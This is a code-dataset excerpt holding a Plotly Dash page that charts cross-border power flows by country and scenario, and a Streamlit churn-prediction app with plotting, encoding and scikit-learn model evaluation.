style=dict(height='45vh',backgroundColor='#20374c') ,figure=line_fig\n ) ] ,id='flow_line_div'\n )\n\n\n# dropdown menu of resolutions\n# dcc.dropdown src : https://dash.plotly.com/dash-core-components/dropdown\n# note that i added some pure css to the all dropdowns in custom css file\n\nresolution_menu= dcc.Dropdown(\n id='flow_resolution_menu',\n options=[\n dict(label='Mean Agg. Quarterly', value='Mean Agg. Quarterly'), dict(label='Sum Agg. Quarterly', value='Sum Agg. Quarterly'),\n dict(label='Mean Agg. Monthly', value='Mean Agg. Monthly'), dict(label='Sum Agg. Monthly', value='Sum Agg. Monthly'),\n dict(label='Mean Agg. Daily', value='Mean Agg. Daily'), dict(label='Sum Agg. Daily', value='Sum Agg. Daily'),\n dict(label='Hourly', value='Hourly')\n ],\n value='Mean Agg. Quarterly' , style=dict(color='#0f2537',fontWeight='bold',textAlign='center',\n width='20vh',backgroundColor='#0f2537',border='1px solid #00bfff')\n )\n\n# text apears above resolution dropdown\nresolution_text=html.Div(html.H1('Resolution',\n style=dict(fontSize=text_font_size,fontWeight='bold',color='white',marginTop='')),\n style=dict(display='inline-block',marginLeft='',textAlign=\"center\",width='100%'))\n\n# the div that contains both the text and dropdown of resolution\nresolution_menu_div= html.Div([resolution_text,resolution_menu],\n style=dict( fontSize=text_font_size,\n marginLeft='2vh',marginBottom='',display='inline-block'))\n\n# the button that is pressed on to download data as csv\n# dbc.Button src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/button/\ndownload_csv=html.Div([dbc.Button(\"Download CSV\", color=\"primary\", size='lg', n_clicks=0,id=\"flow_download_csv\"\n ,style=dict(fontSize='1.6vh')\n )],style=dict(display='inline-block',marginLeft='2vh',marginTop='3%'))\n\n# dash Download component that handles downloading process from browser to device\n# Download component src : https://dash.plotly.com/dash-core-components/download\ncsv_download_data=html.Div([Download(id=\"flow_csv_download_data\")])\n\n# the function that create the flow page layout when pressing on page from navigation bar\ndef creat_flow_layout():\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n df_marks = object['DEU_FRA'] # getting a dataframe from pickle file to be used to get years range of data to be used in years slider later\n\n countries = list(object.keys()) # get countries which are keys of pickle dictionery to be used in countries dropdown menu\n object=None\n\n # list of scenarios to be used in scenarios check boxes later\n scenarios = ['Normal','1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015','Exp']\n\n # dropdown of countries\n country_menu = dcc.Dropdown(className=\"custom-dropdown\",\n id='flow_country_menu',\n\n options=[{'label': country, 'value': country} for country in countries] # get all countries from countries list\n ,\n value=countries[0],\n style=dict(color='#0f2537', fontWeight='bold', textAlign='center',\n width='20vh', backgroundColor='#0f2537', border='1px solid #00bfff')\n )\n\n country_text = html.Div(html.H1('Countries',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"center\", width='100%'))\n\n country_menu_div = html.Div([country_text, country_menu],\n 
style=dict(fontSize=text_font_size,\n marginLeft='', marginBottom='', display='inline-block'))\n\n scenarios_text = html.Div(html.H1('Scenarios',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"left\", width='100%'))\n\n # the check boxes element , src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/input/\n scenarios_list = dbc.Checklist(\n inline=True,\n options=[{'label': scenario, 'value': scenario} for scenario in scenarios] # get all scenarios from scenarios list\n ,\n value=[scenarios[0]], label_style=dict(fontSize='1.5vh'),\n id=\"flow_scenarios_list\", style=dict(fontSize='2vh', marginLeft='0', color='white')\n )\n\n bar_fig=go.Figure(go.Bar())\n\n bar_div = html.Div([\n dcc.Graph(id='flow_bar_chart', config={'displayModeBar': True, 'scrollZoom': True, 'displaylogo': False},\n style=dict(height='60vh', backgroundColor='#20374c'), figure=bar_fig\n )], id='bar_div'\n )\n\n\n\n # create new column of only years by getting the years from date column using pd.DatetimeIndex() function\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DatetimeIndex.year.html\n df_marks['Year'] = (pd.DatetimeIndex(df_marks.iloc[:, 26]).year).astype(str)\n # converting years column to int type\n df_marks['Year']=df_marks['Year'].astype('int32')\n # converting years column to list\n years=df_marks['Year'].to_list()\n # removing repeated years from years list\n years=list(OrderedDict.fromkeys(years))\n # setting the slider years marks from the years list\n marks_values={year: {'label': '{}'.format(year), 'style': {'color': 'white'}} for year in years}\n # dcc.RangeSlider src : https://dash.plotly.com/dash-core-components/rangeslider\n years_slider=html.Div([dcc.RangeSlider(min=years[0], max=years[-1], step=1, value=[years[1],years[-2]], marks=marks_values ,id='flow_bar_slider')\n ])\n\n # layout to be returned\n\n layout = [dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([line_div], size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False)\n , html.Br(), html.Div([country_menu_div, resolution_menu_div, download_csv],\n style={'width': '100%', 'display': 'flex', 'align-items': 'center',\n 'justify-content': 'center'}),\n html.Br(), scenarios_text, scenarios_list, csv_download_data,\n dcc.Store(id='flow_data', data=pd.DataFrame().to_dict('records'))\n\n ], style=dict(height='75vh'))])\n , style=dict(backgroundColor='#20374c')), html.Br()\n ], xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)),\n\n dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([bar_div],size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False ),html.Br(),years_slider\n\n ], style=dict(height='75vh'))])\n\n\n\n , style=dict(backgroundColor='#20374c',height='77vh')), html.Br()],\n\n xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)\n\n )\n\n ]\n return layout\n\n# function used in callback in app.py that returns the flow bar figure\n# it takes input of pickle file dictionery and slider range value\ndef create_flow_bar_fig(object,years_range):\n\n countries = list(object.keys()) # get countries names\n normal_scenario_mean = [] # list that will be filled with top 5 countries with normal scenario mean\n countries_list = [] # list of top 5 country names\n normal_df = pd.DataFrame() # the new 
dataframe that will be filled with the previos values to be used in bar figure\n\n # looping through all countries names\n for country in countries:\n\n df = object[country] # get the dataframe of the related country\n\n df=df[(df['Date'].dt.year>=years_range[0]) & (df['Date'].dt.year<=years_range[1])] # get the data only in between the ranges of slider\n # src : https://stackoverflow.com/questions/46878156/pandas-filter-dataframe-rows-with-a-specific-year\n\n df.set_index('Date', inplace=True)\n df.columns = ['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n mean_power = df['Normal'].mean()\n normal_scenario_mean.append(mean_power) #append the normal scenario mean power value to the list\n countries_list.append(country) # append the country name to the list\n\n object=None\n # add these lists in the new dataframe as columnbs\n normal_df['countries'] = countries_list\n normal_df['normal_scenario_mean'] = normal_scenario_mean\n # sort the values from larger to smaller\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.sort_values.html\n normal_df.sort_values(by='normal_scenario_mean', inplace=True, ascending=False)\n # get the top 5 values with relevent countries\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.nlargest.html\n normal_df = normal_df.nlargest(5, 'normal_scenario_mean')\n # print(normal_df)\n normal_df['normal_scenario_mean'] = normal_df['normal_scenario_mean'].astype('int64') # convert values from float to int\n\n # create horizontal bar chart of top 5\n # src : https://plotly.com/python/horizontal-bar-charts/\n bar_fig = go.Figure(data=[\n go.Bar(name='mean power', x=normal_df['normal_scenario_mean'], y=normal_df['countries'].to_list(),\n marker_color='#00bfff', text=normal_df['normal_scenario_mean'],\n textposition='outside', textfont=dict(\n size=15,\n color=\"white\"\n ), orientation='h')\n ])\n\n bar_fig.update_layout(\n title='Top 5 countries of mean power for normal scenario', xaxis_title='MWh/h',\n yaxis_title='Interconnection with neighbouring countries',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=14, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c' ,margin=dict(l=0, r=10, t=40, b=0)\n\n )\n # ,categoryorder='category descending'\n bar_fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n bar_fig.update_yaxes(showgrid=False, showline=True, zeroline=False, autorange=\"reversed\")\n\n return bar_fig\n", "repo_name": "rodiscience/ML-model-dashboard", "sub_path": "assets/Final/flow_page.py", "file_name": "flow_page.py", "file_ext": "py", "file_size_in_byte": 12185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.graph_objects.Figure", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 20, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 29, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 30, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 40, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 53, "usage_type": 
"call"}, {"api_name": "dash_html_components.Div", "line_number": 58, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_extensions.Download", "line_number": 70, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 88, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 103, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Checklist", "line_number": 113, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 121, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 121, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 123, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 133, "usage_type": "call"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 139, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 139, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_core_components.RangeSlider", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 149, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 149, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 153, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 157, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.DataFrame", 
"line_number": 185, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 219, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 219, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 220, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "9268974671", "text": "import plotly.graph_objects as go\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import cross_validate\nimport base64\nfrom pathlib import Path\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport plotly.figure_factory as ff\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport pickle\nfrom sklearn.model_selection import train_test_split\nimport time\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\n\n# --------------------------------------------\n\n\n@st.cache\ndef load_data(uploaded):\n return pd.read_csv(uploaded)\n\n\ndef download_link(object_to_download, download_filename, download_link_text):\n \"\"\"\n Generates a link to download the given object_to_download.\n\n object_to_download (str, pd.DataFrame): The object to be downloaded.\n download_filename (str): filename and extension of file. e.g. 
mydata.csv, some_txt_output.txt\n download_link_text (str): Text to display for download link.\n\n Examples:\n download_link(YOUR_DF, 'YOUR_DF.csv', 'Click here to download data!')\n download_link(YOUR_STRING, 'YOUR_STRING.txt', 'Click here to download your text!')\n\n \"\"\"\n if isinstance(object_to_download, pd.DataFrame):\n object_to_download = object_to_download.to_csv(index=False)\n\n # some strings <-> bytes conversions necessary here\n b64 = base64.b64encode(object_to_download.encode()).decode()\n\n return f'{download_link_text}'\n\n\ndef customized_plot(type_of_plot, columns, data, target, bins=0):\n\n if type_of_plot == \"Scatter\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.scatter(\n data, x=columns[0], y=columns[1], width=620, height=420, title=\"Evolution of \"+columns[0]+\" according to \" + columns[1])\n\n fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Bar\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.bar(data_frame=data, x=columns[0], y=columns[1],\n width=620, height=420, barmode=\"relative\")\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Countplot\":\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.countplot(x=columns, data=data, hue=target)\n st.pyplot(fig)\n\n fig2, ax2 = plt.subplots()\n ax2 = sns.heatmap(pd.crosstab(\n data[target], data[columns], normalize='columns'), annot=True)\n st.pyplot(fig2)\n\n if type_of_plot == \"Boxplot\":\n if len(columns) > 1:\n fig = px.box(data_frame=data, x=columns[0], y=columns[1])\n else:\n fig = px.box(data_frame=data, y=columns,\n width=620, height=420, orientation=\"v\")\n\n st.plotly_chart(fig)\n\n if type_of_plot == \"Histogram\":\n fig = px.histogram(data_frame=data, x=columns,\n nbins=int(bins), width=620, height=420, title=\"Distribution of \"+columns)\n fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n\n if type_of_plot == \"Distribution\":\n if target not in columns:\n st.subheader(\"distribution curve\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(12, 8))\n ax = plt.axvline(x=data[col].quantile(\n q=0.25), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].quantile(\n q=0.75), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].mean(), c='C1')\n ax = plt.axvline(\n x=data[col].median(), c='C1', linestyle='--')\n\n ax = plt.hist(data[col], bins=100,\n histtype='step', density=True)\n ax = data[col].plot.density(bw_method=0.5)\n\n plt.legend()\n st.pyplot(fig)\n else:\n st.subheader(\"distribution curve between target and variable\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.distplot(\n data[data[target] == 1][col], label=\"Exited\")\n ax = sns.distplot(\n data[data[target] == 0][col], label=\"Stayed\")\n plt.legend()\n st.pyplot(fig)\n\n\ndef target_info(data, target):\n st.text('Value Counts By Target/Class')\n st.write(data[target].value_counts(normalize=True))\n st.write(data.iloc[:, -1].value_counts().plot.pie())\n\n fig = go.Figure(\n data=[go.Pie(labels=['Stayed', 'Exited'], values=data[target].value_counts())])\n\n fig.update_layout(title='Statistic of 
'+target, title_x=0.5, font_size=20)\n st.plotly_chart(fig)\n\n return data[target].value_counts(normalize=True)\n\n\ndef core(data, features, target, model, cv, length):\n\n data = data.dropna()\n features = data.columns.to_list()\n trainset, testset = train_test_split(\n data, train_size=length, random_state=0)\n X_train, y_train = preprocessing(trainset, target)\n \"Train size\", y_train.value_counts()\n X_test, y_test = preprocessing(testset, target)\n \"Test size\", y_test.value_counts()\n\n evaluation(model, X_train, y_train, X_test, y_test, cv)\n\n predictions = model.predict(X_test)\n predictions_p = model.predict_proba(X_test)\n accuracy = accuracy_score(y_test, predictions)\n f_score = f1_score(y_test, predictions, average=\"macro\")\n p = precision_score(y_test, predictions, average=\"macro\")\n r = recall_score(y_test, predictions, average=\"macro\")\n ras = roc_auc_score(y_test, predictions_p[:, 1])\n accuracy_cv = 0\n if cv > 0:\n scores = cross_validate(model, data[features], data[target], cv=cv)\n accuracy_cv = np.mean(scores[\"test_score\"])\n return predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, testset\n\n\ndef view(data, target, length, predictions, predictions_p, y_test):\n data_t = pd.DataFrame({\"actual\": y_test,\n \"predictions\": predictions,\n \"predictions_proba\": predictions_p[:, 1]})\n st.write(data_t)\n st.markdown(\"\"\"\n
The \"predictions_proba\" column shows the model's predicted probability that the observation belongs to class 1.
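# A minimal, self-contained sketch (toy data, not the uploaded churn dataset) of how
# predict_proba relates to the 0/1 labels: for most binary scikit-learn classifiers the
# hard prediction is equivalent to thresholding the class-1 probability at 0.5.
import numpy as np
from sklearn.linear_model import LogisticRegression

X_toy = np.array([[0.0], [1.0], [2.0], [3.0]])   # hypothetical single-feature data
y_toy = np.array([0, 0, 1, 1])
clf = LogisticRegression().fit(X_toy, y_toy)

proba_1 = clf.predict_proba(X_toy)[:, 1]         # probability of class 1 for each row
labels = (proba_1 >= 0.5).astype(int)            # the usual 0.5 decision rule
print(proba_1, labels)                           # labels agree with clf.predict(X_toy) here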
\n \"\"\",\n unsafe_allow_html=True)\n\n labels = ['actual_1', 'predictions_1', 'actual_0', 'predictions_0']\n values = [len(data_t.loc[data_t[\"actual\"] == 1, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"]),\n len(data_t.loc[data_t[\"actual\"] == 0, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])]\n\n fig = px.bar(x=labels, y=values, width=620, height=420,\n title=\"Actual and Predicted values of 0 and 1\")\n fig.update_xaxes(title_text='values')\n fig.update_yaxes(title_text='number of values ​​present')\n st.plotly_chart(fig)\n return data_t\n\n\ndef main_content():\n st.markdown(\"\"\"\n

Churn Prediction App

\n \"\"\", unsafe_allow_html=True)\n\n st.markdown(\"\"\"\n Hello :smiley:. You can see the project here--> Link and the notebook here\n \"\"\",\n unsafe_allow_html=True)\n\n st.sidebar.markdown(\"\"\"\n

Navigation

\n \"\"\",\n unsafe_allow_html=True)\n\n # separateur = st.sidebar.selectbox(\"Choose a separator\", [',', ';'])\n uploaded = st.sidebar.file_uploader(\"upload\", type='csv')\n\n if uploaded:\n data = load_data(uploaded)\n st.sidebar.write(data.shape)\n if data.shape[0] > 5000:\n reducer = st.sidebar.slider(\n \"Randomly reduce data size %\", min_value=0.2, max_value=0.9, value=0.5)\n reduction = data.shape[0]*reducer\n data = data.sample(int(reduction))\n st.sidebar.write(data.shape)\n st.sidebar.markdown(\"\"\"\n

Frame

\n \"\"\",\n unsafe_allow_html=True)\n\n if st.sidebar.button('Display Dataframe'):\n \"Raw Data\", data.head(10)\n\n if st.sidebar.button('Some Statistics'):\n st.write(data.describe())\n\n target = st.sidebar.selectbox(\n 'Choose the Target Variable : ', data.columns)\n if len(data[target].unique()) > 2:\n st.sidebar.warning(\"This variable have too much unique value\")\n good_target = False\n elif data.dtypes[target] == 'object':\n st.sidebar.write(data[target].unique())\n st.sidebar.write(\n \"This target Variable don't have numeric variable. Let's change it:\")\n input1 = st.sidebar.text_input(\n f\"Change {data[target].unique()[0]} into : \")\n input2 = st.sidebar.text_input(\n f\"Change {data[target].unique()[1]} into : \")\n if st.sidebar.button(\"submit\"):\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n st.write(data)\n target_balance = target_info(data, target)\n good_target = True\n\n try:\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n except:\n st.write(\"error !!!!\")\n\n else:\n st.sidebar.info(\"We are good to go :smiley:\")\n target_balance = target_info(data, target)\n good_target = True\n\n st.sidebar.markdown(\"\"\"\n

Visualizing

\n \"\"\",\n unsafe_allow_html=True)\n type_of_plot = st.sidebar.selectbox(\"Select a type of plot\", [\n \"Distribution\", \"Bar\", \"Histogram\", \"Boxplot\", \"Scatter\", \"Countplot\"])\n if type_of_plot == \"Histogram\":\n bins = st.sidebar.number_input(\"Enter bins number : \")\n selected_columns_names = st.sidebar.selectbox(\n \"Select a colomn\", data.columns.tolist())\n\n elif type_of_plot == 'Countplot':\n selected_columns_names = st.sidebar.selectbox(\n \"Select one column :\", data.select_dtypes('object').columns)\n\n else:\n selected_columns_names = st.sidebar.multiselect(\n \"Select columns\", data.columns.tolist())\n\n if st.sidebar.button('Generate Plot'):\n st.success(\n f\"Generating {type_of_plot} for {selected_columns_names}\")\n customized_plot(type_of_plot, selected_columns_names,\n data, target, bins=0)\n\n st.sidebar.markdown(\"\"\"\n

Preprocessing

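# A small self-contained sketch (hypothetical toy column, not the uploaded data) contrasting
# the two encoding options offered in the sidebar code that follows: pd.get_dummies for
# one-hot encoding versus sklearn's LabelEncoder for integer codes.
import pandas as pd
from sklearn.preprocessing import LabelEncoder

toy = pd.DataFrame({"geography": ["France", "Spain", "Germany", "Spain"]})  # made-up column

one_hot = pd.get_dummies(toy, columns=["geography"], drop_first=True)  # OneHotEncoding path
codes = LabelEncoder().fit_transform(toy["geography"])                 # LabelEncoding path

print(one_hot)   # two indicator columns (first category dropped)
print(codes)     # integer codes such as [0, 2, 1, 2]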
\n \"\"\",\n unsafe_allow_html=True)\n\n # if st.sidebar.checkbox(\"Check null values\"):\n # st.write(data.isna().sum())\n # null_vals = [i for i in data.isna().sum()]\n # if np.sum(null_vals) != 0:\n # st.write(\n # f\"There is {np.sum(null_vals)} null values\")\n # choice = st.sidebar.selectbox(\"How do you want to remove NaN values?\", [\n # 'Choose an option', 'Dropna', 'Replace by Mean', 'Drop Columns with NaN'])\n # missing_val_count_by_column = (data.isnull().sum())\n # col_with_NaN = missing_val_count_by_column[missing_val_count_by_column > 0].index.to_list(\n # )\n\n # data = deal_with_NaN(data, choice, col_with_NaN)\n # else:\n # st.write(\"Hum !! You are Lucky :smiley:\")\n\n features = st.sidebar.multiselect(\n \"Features\", data.drop(target, axis=1).columns)\n\n if features:\n data = data[features + [target]]\n\n cat_variable = data.select_dtypes(\n 'object').columns.to_list()\n\n if len(cat_variable) != 0:\n for cat in cat_variable:\n if len(data[cat].unique()) > 50:\n st.sidebar.warning(\n \"Too much unique values in \"+cat+\". OneHotEncoding may take a long time !!\")\n cat_encoder = False\n st.sidebar.write(f\"{cat_variable} are categorical data\")\n choice = st.sidebar.selectbox(f\"Would you like to create dummies for them ?\", [\n 'Choose an options', 'OneHotEncoding', 'LabelEncoding'])\n\n if choice == 'OneHotEncoding':\n try:\n data = pd.get_dummies(\n data=data, columns=cat_variable, drop_first=True)\n st.write(data)\n cat_encoder = True\n except:\n st.sidebar.write('Choose only one option')\n elif choice == 'LabelEncoding':\n try:\n encoder = LabelEncoder()\n for col in cat_variable:\n data[col] = encoder.fit_transform(data[col])\n cat_encoder = True\n st.write(data)\n except:\n st.sidebar.write('Choose only one option')\n else:\n st.sidebar.warning(\"You have to choose an option\")\n else:\n cat_encoder = True\n\n st.sidebar.markdown(\"\"\"\n

Modeling

\n \"\"\",\n unsafe_allow_html=True)\n length = st.sidebar.slider(\n \"Train size\", min_value=0.1, max_value=0.9, value=0.8)\n\n cv = st.sidebar.selectbox(\n \"Cross Validation on the train\",\n [0, 5, 10, 15, 20])\n\n model = st.sidebar.selectbox(\n \"Which model do you like!\",\n [\"Decision Tree\",\n \"Random Forest\",\n \"KnnClassifier\",\n \"Logistic Regression\",\n # \"SgdClassifier\",\n \"SVClassification\",\n ])\n if model == \"Decision Tree\":\n params = [\"criterion\", \"max_depth\", \"max_features\",\n \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n criterion, max_depth, max_features, min_samples_leaf, min_samples_split = \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n dt = DecisionTreeClassifier(random_state=0, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, dt, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Different metrics

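# For reference, a toy sketch (made-up labels, not this app's output) of how the metrics in
# the table shown below are typically computed with scikit-learn, using the same macro
# averaging as the core() helper above.
from sklearn.metrics import (accuracy_score, f1_score, precision_score,
                             recall_score, roc_auc_score)

y_true = [0, 0, 1, 1, 1, 0]                 # hypothetical ground truth
y_pred = [0, 1, 1, 1, 0, 0]                 # hypothetical hard predictions
y_prob = [0.2, 0.6, 0.9, 0.7, 0.4, 0.1]     # hypothetical class-1 probabilities

print(accuracy_score(y_true, y_pred))
print(f1_score(y_true, y_pred, average="macro"))
print(precision_score(y_true, y_pred, average="macro"))
print(recall_score(y_true, y_pred, average="macro"))
print(roc_auc_score(y_true, y_prob))        # ROC AUC uses probabilities, not hard labels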
\n \"\"\",\n unsafe_allow_html=True)\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calculation of your retention and churn rate

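# A worked micro-example (hypothetical numbers) of the retention and churn percentages
# computed just below: with 7 of 10 customers predicted to stay (label 0) and 3 predicted
# to exit (label 1), retention is 70% and churn is 30%.
predictions = [0, 0, 0, 0, 0, 0, 0, 1, 1, 1]

retention_rate = predictions.count(0) / len(predictions) * 100   # predicted to stay
churn_rate = predictions.count(1) / len(predictions) * 100       # predicted to leave
print(retention_rate, churn_rate)                                # 70.0 30.0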
